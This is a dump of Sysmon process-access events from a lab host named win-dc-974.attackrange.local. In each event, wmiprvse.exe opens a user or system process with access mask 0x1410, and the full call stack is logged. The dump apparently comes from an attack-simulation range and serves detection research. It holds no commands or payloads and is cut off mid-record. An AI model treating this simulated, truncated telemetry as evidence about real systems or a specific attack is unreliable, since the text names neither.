16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.951{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.935{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program 